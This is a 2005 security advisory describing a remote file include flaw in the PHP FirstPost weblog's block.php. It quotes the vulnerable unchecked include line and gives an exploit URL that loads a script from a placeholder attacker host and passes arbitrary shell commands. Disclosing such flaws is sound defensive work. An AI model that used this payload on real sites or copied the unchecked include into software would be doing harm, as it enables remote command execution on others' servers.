PHP FirstPost remote file include vulnerability

2005-07-25T00:00:00
ID SECURITYVULNS:DOC:9283
Type securityvulns
Reporter Securityvulns
Modified 2005-07-25T00:00:00

Description

Language: PHP Project name: PHP FirstPost Risk:High Home page: http://phpfirstpost.sourceforge.net Discovered by: ][GB][

PHP FirstPost is yet another PHP weblog. This one, however, is based on Scoop, and has the open submission queue and comment rating system.

A vulnerability exists in PHP FirstPost, which could allow any remote user to include a php script for execute arbitrary commands on the target system.

The problem exists is in the file "block.php" when includes the variable $Include

<?php if($Include) { include($Include); }; ?>

http://[target]/path_to_script/block.php?Include=http://[attacker]/cmd.gif?&cmd=|command|

thanks to Zetha

also greetz to: uyx r3v3ng4ns b-04 LINUX HaCkZaTaN beford Mafia_boy lithyum darksteel caffa nologro unicked

... and all the ppl of irc.gigachat.net #Uruguay, #ASC & #SWC